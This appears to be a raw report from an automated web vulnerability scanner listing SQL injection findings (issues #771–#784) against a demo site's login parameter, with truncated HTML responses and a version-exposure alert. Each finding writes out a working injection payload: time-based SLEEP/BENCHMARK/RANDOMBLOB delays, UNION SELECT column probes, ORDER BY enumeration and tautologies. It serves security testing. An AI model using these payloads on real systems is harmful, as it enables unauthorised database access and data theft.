Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #771\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io OR 2947=LIKE('ABCDEFG',UPPER(HEX(\nRANDOMBLOB(500000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #772Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\") or (\"x\")=(\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #773\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\"&\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #774\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #775\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #776\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+\nCHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+\nCHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+\nCHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113),NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #777\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of\nZendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> <\n/script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link\nrel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWF\nnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoq\nIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints \non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #778\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #779\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #780\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #781\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #782\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #783\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #784\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=x--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: 